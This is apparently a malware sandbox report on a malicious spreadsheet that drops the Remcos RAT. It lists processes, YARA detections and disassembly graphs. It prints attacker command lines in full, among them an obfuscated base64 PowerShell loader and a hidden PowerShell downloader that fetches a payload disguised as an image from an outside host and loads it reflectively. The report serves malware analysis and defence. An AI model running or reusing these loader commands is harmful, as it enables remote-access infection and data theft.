                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x1170000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:00:56:46
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                      Imagebase:0x13f300000
                                                      File size:13'824 bytes
                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:00:56:50
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                                                      Imagebase:0xff940000
                                                      File size:345'088 bytes
                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:00:56:50
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:00:56:51
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                                                      Imagebase:0x13f1b0000
                                                      File size:2'758'280 bytes
                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:00:56:51
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                                                      Imagebase:0x13fdf0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:00:56:57
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                                                      Imagebase:0xffaf0000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:00:56:57
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<obfuscated base64 payload removed>';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:00:56:58
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:00:57:03
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x1170000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      Has exited:true

                                                      Module: Sheet1

                                                      Declaration
                                                      Attribute VB_Name = "Sheet1"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True

                                                      Module: Sheet2

                                                      Declaration
                                                      Attribute VB_Name = "Sheet2"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True

                                                      Module: Sheet3

                                                      Declaration
                                                      Attribute VB_Name = "Sheet3"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True

                                                      Module: ThisWorkbook

                                                      Declaration
                                                      Attribute VB_Name = "ThisWorkbook"
                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000003.406020583.0000000003750000.00000010.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_3_3750000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 377030c2138ab9a35897f8319153199091d0001d61e4c591b97cf33f0a763eb9
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:

                                                        Execution Graph

                                                        Execution Coverage:4.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 3831 7fe899b7ae1 3833 7fe899b7af1 URLDownloadToFileW 3831->3833 3834 7fe899b7c00 3833->3834

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.430954303.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe899b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: DownloadFile
                                                        • String ID:
                                                        • API String ID: 1407266417-0
                                                        • Opcode ID: bfd0817e0d9f0d9b53ce26fec69c51a9986ebb173b4ab4b37d78c130f1513db3
                                                        • Instruction ID: 46c243d09054ab40253488f3e5ce1efcd0ed19cd4b9d56ea58fdf58971caab7f
                                                        • Opcode Fuzzy Hash: bfd0817e0d9f0d9b53ce26fec69c51a9986ebb173b4ab4b37d78c130f1513db3
                                                        • Instruction Fuzzy Hash: A0319131918A5C9FDB58EF5CD8897B9B7E1FB69321F00822ED04DD3661CB74B8058B81

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (F|$8F|
                                                        • API String ID: 0-2149209761
                                                        • Opcode ID: 3ac9ae19db09d76824e0295901c8e00a20690fc75118f3bf0fc7735805d88a93
                                                        • Instruction ID: 9ab7d69ace76f2375d71b4c8356fbcfa62a0714b1537f01eab1ef865fa200290
                                                        • Opcode Fuzzy Hash: 3ac9ae19db09d76824e0295901c8e00a20690fc75118f3bf0fc7735805d88a93
                                                        • Instruction Fuzzy Hash: 19C1573091DAC94FE74AA72C94547BABFE1FF46784F1401EAD44EDB2A3D618AC12C361

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8h:$xF|
                                                        • API String ID: 0-4105707869
                                                        • Opcode ID: 1015a5a0d7b98c64e085e5481155fced844f18e8430cdfe02785a4efc861bcc6
                                                        • Instruction ID: f92a4cb4493973ebf836f3e9bdea7540f2b9cdd36be2d0fd546c887022013a41
                                                        • Opcode Fuzzy Hash: 1015a5a0d7b98c64e085e5481155fced844f18e8430cdfe02785a4efc861bcc6
                                                        • Instruction Fuzzy Hash: 3A41AF11A0DBC90FE34B933C6864364BFE1EF5B259B2901EBC48ECB1A3D9099C568361

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.430954303.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe899b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: DownloadFile
                                                        • String ID:
                                                        • API String ID: 1407266417-0
                                                        • Opcode ID: ae11ca3b073b036b9c49a96c2ad35bfd071a57fd259931aa57f4ccdfa08bb56d
                                                        • Instruction ID: 09dbe4eff7c93bd60af26e2bbd03176807ae0be541b8008077dd7616fc7286d9
                                                        • Opcode Fuzzy Hash: ae11ca3b073b036b9c49a96c2ad35bfd071a57fd259931aa57f4ccdfa08bb56d
                                                        • Instruction Fuzzy Hash: 5441F67181CB989FD715DB589C547AABBF0FB56321F04426FD08DD35A2CB646806CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 7fe89a886a9-7fe89a886d0 99 7fe89a8868f-7fe89a88698 97->99 100 7fe89a886d2-7fe89a88708 97->100 102 7fe89a88699-7fe89a886a5 99->102 100->102 105 7fe89a8870a-7fe89a88759 100->105 106 7fe89a88c3d-7fe89a88cf6 105->106 107 7fe89a8875f-7fe89a88769 105->107 108 7fe89a8876b-7fe89a88778 107->108 109 7fe89a88782-7fe89a88789 107->109 108->109 110 7fe89a8877a-7fe89a88780 108->110 111 7fe89a8878b-7fe89a8879e 109->111 112 7fe89a887a0 109->112 110->109 114 7fe89a887a2-7fe89a887a4 111->114 112->114 117 7fe89a88bb8-7fe89a88bc2 114->117 118 7fe89a887aa-7fe89a887b6 114->118 119 7fe89a88bd5-7fe89a88be5 117->119 120 7fe89a88bc4-7fe89a88bd4 117->120 118->106 121 7fe89a887bc-7fe89a887c6 118->121 123 7fe89a88be7-7fe89a88beb 119->123 124 7fe89a88bf2-7fe89a88c3c 119->124 125 7fe89a887c8-7fe89a887d5 121->125 126 7fe89a887e2-7fe89a887f2 121->126 123->124 125->126 127 7fe89a887d7-7fe89a887e0 125->127 126->117 131 7fe89a887f8-7fe89a8882c 126->131 127->126 131->117 137 7fe89a88832-7fe89a8883e 131->137 137->106 138 7fe89a88844-7fe89a8884e 137->138 139 7fe89a88867-7fe89a8886c 138->139 140 7fe89a88850-7fe89a8885d 138->140 139->117 142 7fe89a88872-7fe89a88877 139->142 140->139 141 7fe89a8885f-7fe89a88865 140->141 141->139 142->117 143 7fe89a8887d-7fe89a88882 142->143 143->117 144 7fe89a88888-7fe89a88897 143->144 146 7fe89a888a7 144->146 147 7fe89a88899-7fe89a888a3 144->147 150 7fe89a888ac-7fe89a888b9 146->150 148 7fe89a888c3-7fe89a8894e 147->148 149 7fe89a888a5 147->149 157 7fe89a88950-7fe89a8895b 148->157 158 7fe89a88962-7fe89a88984 148->158 149->150 150->148 151 7fe89a888bb-7fe89a888c1 150->151 151->148 157->158 159 7fe89a88986-7fe89a88990 158->159 160 7fe89a88994 158->160 161 7fe89a889b0-7fe89a88a3e 159->161 162 7fe89a88992 159->162 163 7fe89a88999-7fe89a889a6 160->163 170 7fe89a88a40-7fe89a88a4b 161->170 171 7fe89a88a52-7fe89a88a70 161->171 162->163 163->161 164 7fe89a889a8-7fe89a889ae 163->164 164->161 170->171 172 
7fe89a88a80 171->172 173 7fe89a88a72-7fe89a88a7c 171->173 176 7fe89a88a85-7fe89a88a93 172->176 174 7fe89a88a9d-7fe89a88b2d 173->174 175 7fe89a88a7e 173->175 183 7fe89a88b2f-7fe89a88b3a 174->183 184 7fe89a88b41-7fe89a88b9a 174->184 175->176 176->174 178 7fe89a88a95-7fe89a88a9b 176->178 178->174 183->184 187 7fe89a88ba2-7fe89a88bb7 184->187
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70dd4a4c95b6af7aff3b97b7872a79423829a920cc4069bfaf23e10e7aab4529
                                                        • Instruction ID: 4a0577d5d139b19a115dc91dff0e1dcada076adba86f67e5b480930baf943c0e
                                                        • Opcode Fuzzy Hash: 70dd4a4c95b6af7aff3b97b7872a79423829a920cc4069bfaf23e10e7aab4529
                                                        • Instruction Fuzzy Hash: 9E22163090CB894FE799DB2C8854679BBE2FF8A344F2401EAD45ED72A3DA24AC55C741

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 188 7fe89a85c7d-7fe89a85c87 189 7fe89a85c89 188->189 190 7fe89a85c8e-7fe89a85c9f 188->190 189->190 191 7fe89a85c8b 189->191 192 7fe89a85ca6-7fe89a85cb7 190->192 193 7fe89a85ca1 190->193 191->190 195 7fe89a85cb9 192->195 196 7fe89a85cbe-7fe89a85ccf 192->196 193->192 194 7fe89a85ca3 193->194 194->192 195->196 197 7fe89a85cbb 195->197 198 7fe89a85cd6-7fe89a85ce7 196->198 199 7fe89a85cd1 196->199 197->196 200 7fe89a85ce9 198->200 201 7fe89a85cee-7fe89a85d38 198->201 199->198 202 7fe89a85cd3 199->202 200->201 203 7fe89a85ceb 200->203 204 7fe89a85d3a-7fe89a85d40 201->204 205 7fe89a85d95-7fe89a85d9c 201->205 202->198 203->201 206 7fe89a85d9d-7fe89a85daa 204->206 207 7fe89a85d42-7fe89a85d92 204->207 205->206 208 7fe89a85db0-7fe89a85dba 206->208 209 7fe89a85f13-7fe89a85fdc 206->209 207->205 210 7fe89a85dbc-7fe89a85dc9 208->210 211 7fe89a85dd3-7fe89a85dd8 208->211 210->211 213 7fe89a85dcb-7fe89a85dd1 210->213 214 7fe89a85dde-7fe89a85de1 211->214 215 7fe89a85eb3-7fe89a85ebd 211->215 213->211 218 7fe89a85e26 214->218 219 7fe89a85de3-7fe89a85df2 214->219 216 7fe89a85ebf-7fe89a85ecd 215->216 217 7fe89a85ece-7fe89a85ede 215->217 221 7fe89a85eeb-7fe89a85f10 217->221 222 7fe89a85ee0-7fe89a85ee4 217->222 223 7fe89a85e28-7fe89a85e2a 218->223 219->209 227 7fe89a85df8-7fe89a85e02 219->227 221->209 222->221 223->215 226 7fe89a85e30-7fe89a85e36 223->226 229 7fe89a85e38-7fe89a85e45 226->229 230 7fe89a85e52-7fe89a85e94 226->230 232 7fe89a85e1b-7fe89a85e24 227->232 233 7fe89a85e04-7fe89a85e11 227->233 229->230 234 7fe89a85e47-7fe89a85e50 229->234 242 7fe89a85e9a-7fe89a85eb2 230->242 232->223 233->232 236 7fe89a85e13-7fe89a85e19 233->236 234->230 236->232
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd691862fd6e6e1d215e56f8d690554d9b77f45eb35af49e80f9f0fa99ad2e18
                                                        • Instruction ID: 8d3128732ab726f84680d421e954cd65ace10246b5b2c83c8b53b080f4733995
                                                        • Opcode Fuzzy Hash: dd691862fd6e6e1d215e56f8d690554d9b77f45eb35af49e80f9f0fa99ad2e18
                                                        • Instruction Fuzzy Hash: 5AD1147080E7C90FD357A73898546B57FE0EF47260F1911EBD48DDB0A3D619A85AC3A2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2eeedd9d8e04da31804b3991e9344b7d37ab045d735e02f24823d178b1e48d07
                                                        • Instruction ID: fb254cea977dcb68475b029cce613f260c7aec4ca8ea0a45cca19af07cd87805
                                                        • Opcode Fuzzy Hash: 2eeedd9d8e04da31804b3991e9344b7d37ab045d735e02f24823d178b1e48d07
                                                        • Instruction Fuzzy Hash: E1C1D22080E7C60FE757977848656A57FF1EF47254F1A01EBC489DB0A3DA1CAC5AC362

                                                        Execution Graph

                                                        Execution Coverage:9.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:12
                                                        Total number of Limit Nodes:0
                                                        execution_graph 2158 7fe899d734d 2160 7fe899d735b WriteProcessMemory 2158->2160 2161 7fe899d74d4 2160->2161 2162 7fe899d6e49 2163 7fe899d6e57 Wow64SetThreadContext 2162->2163 2165 7fe899d6fa1 2163->2165 2166 7fe899d7539 2167 7fe899d7547 ResumeThread 2166->2167 2169 7fe899d761c 2167->2169 2170 7fe899d6a15 2171 7fe899d6a40 CreateProcessW 2170->2171 2173 7fe899d6cd0 2171->2173

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7fe89aa114e-7fe89aa11d4 2 7fe89aa11da-7fe89aa11e4 0->2 3 7fe89aa13c3-7fe89aa146d 0->3 4 7fe89aa11e6-7fe89aa11f3 2->4 5 7fe89aa11fd-7fe89aa1202 2->5 37 7fe89aa1470-7fe89aa1481 3->37 38 7fe89aa146f 3->38 4->5 7 7fe89aa11f5-7fe89aa11fb 4->7 8 7fe89aa1208-7fe89aa120b 5->8 9 7fe89aa1364-7fe89aa136e 5->9 7->5 12 7fe89aa120d-7fe89aa1220 8->12 13 7fe89aa1222 8->13 10 7fe89aa137d-7fe89aa138d 9->10 11 7fe89aa1370-7fe89aa137c 9->11 16 7fe89aa139a-7fe89aa13c0 10->16 17 7fe89aa138f-7fe89aa1393 10->17 14 7fe89aa1224-7fe89aa1226 12->14 13->14 14->9 19 7fe89aa122c-7fe89aa1263 14->19 16->3 17->16 25 7fe89aa1287 19->25 26 7fe89aa1265-7fe89aa1285 19->26 28 7fe89aa1289-7fe89aa128b 25->28 26->28 28->9 31 7fe89aa1291-7fe89aa1294 28->31 32 7fe89aa1296-7fe89aa12a9 31->32 33 7fe89aa12ab 31->33 34 7fe89aa12ad-7fe89aa12af 32->34 33->34 34->9 39 7fe89aa12b5-7fe89aa12ef 34->39 40 7fe89aa1484-7fe89aa1514 37->40 41 7fe89aa1483 37->41 38->37 54 7fe89aa1308-7fe89aa130e 39->54 55 7fe89aa12f1-7fe89aa12fe 39->55 42 7fe89aa164d-7fe89aa16f9 40->42 43 7fe89aa151a-7fe89aa1524 40->43 41->40 92 7fe89aa16fc-7fe89aa170d 42->92 93 7fe89aa16fb 42->93 45 7fe89aa1526-7fe89aa1533 43->45 46 7fe89aa153d-7fe89aa1542 43->46 45->46 47 7fe89aa1535-7fe89aa153b 45->47 49 7fe89aa1548-7fe89aa154b 46->49 50 7fe89aa15ee-7fe89aa15f8 46->50 47->46 56 7fe89aa154d-7fe89aa1560 49->56 57 7fe89aa1562 49->57 52 7fe89aa1607-7fe89aa1617 50->52 53 7fe89aa15fa-7fe89aa1606 50->53 58 7fe89aa1619-7fe89aa161d 52->58 59 7fe89aa1624-7fe89aa164a 52->59 62 7fe89aa132a-7fe89aa132d 54->62 63 7fe89aa1310-7fe89aa131d 54->63 55->54 61 7fe89aa1300-7fe89aa1306 55->61 64 7fe89aa1564-7fe89aa1566 56->64 57->64 58->59 59->42 61->54 68 7fe89aa1334-7fe89aa133d 62->68 63->62 66 7fe89aa131f-7fe89aa1328 63->66 64->50 67 7fe89aa156c-7fe89aa156f 64->67 66->62 71 7fe89aa1596 67->71 72 7fe89aa1571-7fe89aa1594 67->72 74 7fe89aa1356-7fe89aa1363 68->74 75 7fe89aa133f-7fe89aa134c 68->75 76 
7fe89aa1598-7fe89aa159a 71->76 72->76 75->74 80 7fe89aa134e-7fe89aa1354 75->80 76->50 81 7fe89aa159c-7fe89aa15b8 76->81 80->74 87 7fe89aa15be-7fe89aa15c7 81->87 88 7fe89aa15c9-7fe89aa15d6 87->88 89 7fe89aa15e0-7fe89aa15ed 87->89 88->89 91 7fe89aa15d8-7fe89aa15de 88->91 91->89 94 7fe89aa1710-7fe89aa17a4 92->94 95 7fe89aa170f 92->95 93->92 97 7fe89aa17aa-7fe89aa17b4 94->97 98 7fe89aa1902-7fe89aa19ad 94->98 95->94 99 7fe89aa17b6-7fe89aa17c3 97->99 100 7fe89aa17cd-7fe89aa17d2 97->100 135 7fe89aa19b0-7fe89aa19c1 98->135 136 7fe89aa19af 98->136 99->100 104 7fe89aa17c5-7fe89aa17cb 99->104 101 7fe89aa17d8-7fe89aa17db 100->101 102 7fe89aa18a3-7fe89aa18ad 100->102 105 7fe89aa17dd-7fe89aa17f0 101->105 106 7fe89aa17f2 101->106 107 7fe89aa18bc-7fe89aa18cc 102->107 108 7fe89aa18af-7fe89aa18bb 102->108 104->100 110 7fe89aa17f4-7fe89aa17f6 105->110 106->110 112 7fe89aa18d9-7fe89aa18ff 107->112 113 7fe89aa18ce-7fe89aa18d2 107->113 110->102 114 7fe89aa17fc-7fe89aa17ff 110->114 112->98 113->112 116 7fe89aa1816 114->116 117 7fe89aa1801-7fe89aa1814 114->117 119 7fe89aa1818-7fe89aa181a 116->119 117->119 119->102 120 7fe89aa1820-7fe89aa1826 119->120 122 7fe89aa1828-7fe89aa1835 120->122 123 7fe89aa1842-7fe89aa1848 120->123 122->123 126 7fe89aa1837-7fe89aa1840 122->126 124 7fe89aa184a-7fe89aa1857 123->124 125 7fe89aa1864-7fe89aa18a2 123->125 124->125 128 7fe89aa1859-7fe89aa1862 124->128 126->123 128->125 137 7fe89aa19c4-7fe89aa1a43 135->137 138 7fe89aa19c3 135->138 136->135 139 7fe89aa1abf-7fe89aa1ac9 137->139 140 7fe89aa1a45-7fe89aa1a5a 137->140 138->137 142 7fe89aa1acb-7fe89aa1ad4 139->142 143 7fe89aa1ad5-7fe89aa1ae5 139->143 140->139 141 7fe89aa1a5c-7fe89aa1a69 140->141 146 7fe89aa1a7d-7fe89aa1abc 141->146 147 7fe89aa1a6b-7fe89aa1a76 141->147 144 7fe89aa1ae7-7fe89aa1aeb 143->144 145 7fe89aa1af2-7fe89aa1b15 143->145 144->145 146->139 147->146
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (be$XhI$XhI$r68$r68
                                                        • API String ID: 0-3442194146
                                                        • Opcode ID: c9617e4c57d6181de3cc8a4e85977b9453593b45eae6a95bb6859bba1193e290
